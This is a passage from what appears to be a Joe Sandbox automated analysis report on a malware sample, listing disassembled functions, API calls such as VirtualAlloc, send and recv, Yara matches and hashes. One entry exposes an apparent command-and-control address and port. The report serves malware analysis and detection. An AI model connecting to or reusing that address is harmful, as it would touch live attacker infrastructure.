                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: 853a2556b3efea8bef58b5d23f59a5bf7b66cbc657f48b339a2ce54e35070986
                                                                                                                            • Instruction ID: 9a9d92c38c2a8e9fd00e49e59c738ca8a20046892c7432e9184604421e5a52dd
                                                                                                                            • Opcode Fuzzy Hash: 853a2556b3efea8bef58b5d23f59a5bf7b66cbc657f48b339a2ce54e35070986
                                                                                                                            • Instruction Fuzzy Hash: 79118474E40705AFDB109FA9DC85B9EFBF8EF04705F008969E959E2240E770A9148B54
                                                                                                                            Function 03621100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 0362112F
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0362115F
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03621192
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: e95a3eea677f40f9195e112befa9e478a148172094910cf8ad552789173da06d
                                                                                                                            • Instruction ID: e6cf20466027a03e920654a9f05e75056d91593f3c4d612024617b0510ae7b1f
                                                                                                                            • Opcode Fuzzy Hash: e95a3eea677f40f9195e112befa9e478a148172094910cf8ad552789173da06d
                                                                                                                            • Instruction Fuzzy Hash: 4011D074E04B08AFDB10DFA9D886B6FFFF8EF05701F0084A9E959E6240E730A9108B54
                                                                                                                            Function 03629DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03629E04
                                                                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03629E18
                                                                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03629E3B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 800915452-0
                                                                                                                            • Opcode ID: 29d01d67518ba7a6c23bb462d6e3f2f23d2240f400a9b393c42892c24e454810
                                                                                                                            • Instruction ID: ac7e1fda2132486f9f99201736bcfe544dda01f70c534634ea08f93356df7998
                                                                                                                            • Opcode Fuzzy Hash: 29d01d67518ba7a6c23bb462d6e3f2f23d2240f400a9b393c42892c24e454810
                                                                                                                            • Instruction Fuzzy Hash: 23F08176D00229978B11EF94D9448AEFBB8AF45B11B11454AF805AB344D7308E15CBD1
                                                                                                                            Function 03629AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64), ref: 03629ADC
                                                                                                                            • GdiplusStartup.GDIPLUS(0364FB60,?,?), ref: 03629B15
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64), ref: 03629B26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 389129658-0
                                                                                                                            • Opcode ID: 41868925c26dd5369b448f74150056fc83b3ee865bbdfe24f6f527368d3ff402
                                                                                                                            • Instruction ID: d6510d3be19ee1e8ad24078415d917363ef341757ff1e28a32c3e0eac59187d2
                                                                                                                            • Opcode Fuzzy Hash: 41868925c26dd5369b448f74150056fc83b3ee865bbdfe24f6f527368d3ff402
                                                                                                                            • Instruction Fuzzy Hash: 28F0C275E406099FDB00EFD1E82A7EBBBB8F705301F102199F80456244D7B20154CBA2
                                                                                                                            Function 02C33200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID: 118.107.44.219$19091
                                                                                                                            • API String ID: 3472027048-838246116
                                                                                                                            • Opcode ID: b6cd9b7fb2a0fe5c1316a1649715c9fe73f562eb5e2c3d6883111fbef6dd95fe
                                                                                                                            • Instruction ID: 28a7d9eba2e33e830f2ec8e146bb28320fa6164dd507d47ba2b9dbcbce883f20
                                                                                                                            • Opcode Fuzzy Hash: b6cd9b7fb2a0fe5c1316a1649715c9fe73f562eb5e2c3d6883111fbef6dd95fe
                                                                                                                            • Instruction Fuzzy Hash: 37D022F0E401718BBA19851188A0537B3B5BE843693440A28FC8397280CAA8FC18DAA0
                                                                                                                            Function 02C37156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 02C3715B
                                                                                                                              • Part of subcall function 02C39896: GetLastError.KERNEL32(00000001,00000000,02C37112,02C36F0C,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C3989A
                                                                                                                              • Part of subcall function 02C39896: ___set_flsgetvalue.LIBCMT ref: 02C398A8
                                                                                                                              • Part of subcall function 02C39896: __calloc_crt.LIBCMT ref: 02C398BC
                                                                                                                              • Part of subcall function 02C39896: DecodePointer.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C398D6
                                                                                                                              • Part of subcall function 02C39896: GetCurrentThreadId.KERNEL32 ref: 02C398EC
                                                                                                                              • Part of subcall function 02C39896: SetLastError.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C39904
                                                                                                                            • __freeptd.LIBCMT ref: 02C37165
                                                                                                                              • Part of subcall function 02C39A58: TlsGetValue.KERNEL32(?,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39A79
                                                                                                                              • Part of subcall function 02C39A58: TlsGetValue.KERNEL32(?,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39A8B
                                                                                                                              • Part of subcall function 02C39A58: DecodePointer.KERNEL32(00000000,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39AA1
                                                                                                                              • Part of subcall function 02C39A58: __freefls@4.LIBCMT ref: 02C39AAC
                                                                                                                              • Part of subcall function 02C39A58: TlsSetValue.KERNEL32(00000025,00000000,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39ABE
                                                                                                                            • ExitThread.KERNEL32 ref: 02C3716E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4224061863-0
                                                                                                                            • Opcode ID: 184329003cbd9bb28fbe0d512bb1579657001b976ff23ee72bd3ae7714f44a84
                                                                                                                            • Instruction ID: 007cfd724e0a9c6bdb776d03ad721485d3470450b45593a8693d79b008b1f2d7
                                                                                                                            • Opcode Fuzzy Hash: 184329003cbd9bb28fbe0d512bb1579657001b976ff23ee72bd3ae7714f44a84
                                                                                                                            • Instruction Fuzzy Hash: 0DC08C2144024C2B8A123B328C0C90B3A9E8EC0340B900C10B80881000DEB0D8009D51
                                                                                                                            Function 0362F964 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 0362F969
                                                                                                                              • Part of subcall function 03633DE2: GetLastError.KERNEL32(00000001,00000000,0362F920,0362F6FC,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 03633DE6
                                                                                                                              • Part of subcall function 03633DE2: ___set_flsgetvalue.LIBCMT ref: 03633DF4
                                                                                                                              • Part of subcall function 03633DE2: __calloc_crt.LIBCMT ref: 03633E08
                                                                                                                              • Part of subcall function 03633DE2: DecodePointer.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633E22
                                                                                                                              • Part of subcall function 03633DE2: GetCurrentThreadId.KERNEL32 ref: 03633E38
                                                                                                                              • Part of subcall function 03633DE2: SetLastError.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633E50
                                                                                                                            • __freeptd.LIBCMT ref: 0362F973
                                                                                                                              • Part of subcall function 03633FA6: TlsGetValue.KERNEL32(?,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633FC7
                                                                                                                              • Part of subcall function 03633FA6: TlsGetValue.KERNEL32(?,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633FD9
                                                                                                                              • Part of subcall function 03633FA6: DecodePointer.KERNEL32(00000000,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633FEF
                                                                                                                              • Part of subcall function 03633FA6: __freefls@4.LIBCMT ref: 03633FFA
                                                                                                                              • Part of subcall function 03633FA6: TlsSetValue.KERNEL32(00000027,00000000,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 0363400C
                                                                                                                            • ExitThread.KERNEL32 ref: 0362F97C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4224061863-0
                                                                                                                            • Opcode ID: 6030c25ae30906d63bc75ec049cf1b7d1e5554e05c7c6601f9e3848ef0002684
                                                                                                                            • Instruction ID: 3e5e7510b26dc61a4cd966bab344bec4dd10dbf973468e10229fb95788f95509
                                                                                                                            • Opcode Fuzzy Hash: 6030c25ae30906d63bc75ec049cf1b7d1e5554e05c7c6601f9e3848ef0002684
                                                                                                                            • Instruction Fuzzy Hash: E9C08C3C4047083F8B107732891891A7E2C8D802007740018B8048D200DE20DC008898
                                                                                                                            Function 034A01CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 034A022B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                            • Instruction ID: 5c8aaf4b3901ad17c874f7cc9e2473b28f9d81af818ff8d8fc8c2abbcbfeab1e
                                                                                                                            • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                            • Instruction Fuzzy Hash: 1EA14C71A00A06EFDB14CFADC880AAEB7B5FF58304F1881AAE415DB751D770EA51CB94
                                                                                                                            Function 02C33350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time_memmovetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1463837790-0
                                                                                                                            • Opcode ID: e611bc1531684fe6ab2ba7c75af826e30a4fb797514c41eabaaf72593474972d
                                                                                                                            • Instruction ID: 3eff380420f40d1d5af2e0770b76757c9483a4c3ce4dd6a6f79936e17b6d2b7d
                                                                                                                            • Opcode Fuzzy Hash: e611bc1531684fe6ab2ba7c75af826e30a4fb797514c41eabaaf72593474972d
                                                                                                                            • Instruction Fuzzy Hash: 415181727006419FD716DF69C8C0A6ABBA6BF84324714CAACE91ADB704DB31F951CBD0
                                                                                                                            Function 03623360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Time_memmovetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1463837790-0
                                                                                                                            • Opcode ID: 18a83a2a4c0fd2549c0093624b5e2a6e78965aa4a866fd72b21ffc1a4e5fc500
                                                                                                                            • Instruction ID: 908232e423dce5ce98e179546ab014da8efa031cbb5660160c91d3e013680516
                                                                                                                            • Opcode Fuzzy Hash: 18a83a2a4c0fd2549c0093624b5e2a6e78965aa4a866fd72b21ffc1a4e5fc500
                                                                                                                            • Instruction Fuzzy Hash: 2E51F57A700A259FC711CF69C9C0D6ABBA9BF4421072A86ACE809CB700D734F941CFA0
                                                                                                                            Function 02C32FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02C33023
                                                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 02C33044
                                                                                                                              • Part of subcall function 02C3710D: __getptd_noexit.LIBCMT ref: 02C3710D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4248608111-0
                                                                                                                            • Opcode ID: 34f1be8fd1b981532bbd8d4aa2a8ea5e84aa0f4027545e3e7f7ff9ccf79fe120
                                                                                                                            • Instruction ID: 5021bfb3435da1dfb3ece92ffd31151f5857a13de1b29fde8b8914c9a40a4365
                                                                                                                            • Opcode Fuzzy Hash: 34f1be8fd1b981532bbd8d4aa2a8ea5e84aa0f4027545e3e7f7ff9ccf79fe120
                                                                                                                            • Instruction Fuzzy Hash: 6321A6B1E00248DBDB22DF64DC88B9A77B5EF45314F1009E5E5156B190DB71AA84CFE1
                                                                                                                            Function 03622FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03623043
                                                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 03623064
                                                                                                                              • Part of subcall function 0362F91B: __getptd_noexit.LIBCMT ref: 0362F91B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4248608111-0
                                                                                                                            • Opcode ID: afaebe1e7b62a017a6ad0c47d1fbed4693fb40b778a7379dfd29e4506d993b78
                                                                                                                            • Instruction ID: 65ef1cb1497bddf065f22c68e0e9b9e5b4ffcf18e09e11d49e5f2d427784a1eb
                                                                                                                            • Opcode Fuzzy Hash: afaebe1e7b62a017a6ad0c47d1fbed4693fb40b778a7379dfd29e4506d993b78
                                                                                                                            • Instruction Fuzzy Hash: EC21E6789007289BDB20EF69DD44B9A7BB4EF04310F2A05A5E5045F3C0D7B49980CFB5
                                                                                                                            Function 03623260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • send.WS2_32(?,?,00040000,00000000), ref: 03623291
                                                                                                                            • send.WS2_32(?,?,?,00000000), ref: 036232CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: send
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2809346765-0
                                                                                                                            • Opcode ID: 85ff90ae9eb4c09494319e0277c8df2f8f78626af34bd54697b2a46b996ba106
                                                                                                                            • Instruction ID: a93a013a886250555c3d5c12b8285c5963db079545e3c2a30a36adfda7695925
                                                                                                                            • Opcode Fuzzy Hash: 85ff90ae9eb4c09494319e0277c8df2f8f78626af34bd54697b2a46b996ba106
                                                                                                                            • Instruction Fuzzy Hash: EB11E97AB02B1467C720CA6ADD84B5ABF99FB41364F364125F908D7380D378ED418A5C
                                                                                                                            Function 02C330C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SleepTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 346578373-0
                                                                                                                            • Opcode ID: 4ae49f2e733b8c625c1a18179756460b8b5e713efd7c0d32e98be73ddb0b7e95
                                                                                                                            • Instruction ID: a5703108e563902ca281abcb9844decb82028e244ae37dfd2ab78d238c290b1f
                                                                                                                            • Opcode Fuzzy Hash: 4ae49f2e733b8c625c1a18179756460b8b5e713efd7c0d32e98be73ddb0b7e95
                                                                                                                            • Instruction Fuzzy Hash: ED01D435600645AFD711CF29D8C8B6DB3B5FB99345F144664D5008B2C0C775AAD5C7D1
                                                                                                                            Function 036230E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: SleepTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 346578373-0
                                                                                                                            • Opcode ID: 538459c2f22fb5caa6d512776774ba82b64a9fb52dda716a7a1edc78c9241e92
                                                                                                                            • Instruction ID: 0ec5eb19a2861e146e57c7fd8679c1157a1d566398177841f8169cd5a538e1de
                                                                                                                            • Opcode Fuzzy Hash: 538459c2f22fb5caa6d512776774ba82b64a9fb52dda716a7a1edc78c9241e92
                                                                                                                            • Instruction Fuzzy Hash: 9201D439600615AFD315DF28C8C8B69FFB5FB59305F294264E60447380C735A9D6CBD1
                                                                                                                            Function 02C36410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02C35AF2), ref: 02C3642B
                                                                                                                            • _free.LIBCMT ref: 02C36466
                                                                                                                              • Part of subcall function 02C31280: __CxxThrowException@8.LIBCMT ref: 02C31290
                                                                                                                              • Part of subcall function 02C31280: DeleteCriticalSection.KERNEL32(00000000,?,02C47E78), ref: 02C312A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1116298128-0
                                                                                                                            • Opcode ID: 3b0103dc7ed38717ae8e1f7aac1c2cb0372064f90573f088561b52be982f79ed
                                                                                                                            • Instruction ID: 9a4a6630a86f7df0e865a9f7365b00ff3ba96bbf5d2eb4e0a34acb3f6a949850
                                                                                                                            • Opcode Fuzzy Hash: 3b0103dc7ed38717ae8e1f7aac1c2cb0372064f90573f088561b52be982f79ed
                                                                                                                            • Instruction Fuzzy Hash: 960168B4A00B409FC3219F6A9844A07FAE8BF98710B104A1EE2DAC6A10D370A145CF95
                                                                                                                            Function 0362CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,0362E04E,00000000,03629800,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 0362CD1B
                                                                                                                            • _free.LIBCMT ref: 0362CD56
                                                                                                                              • Part of subcall function 03621280: __CxxThrowException@8.LIBCMT ref: 03621290
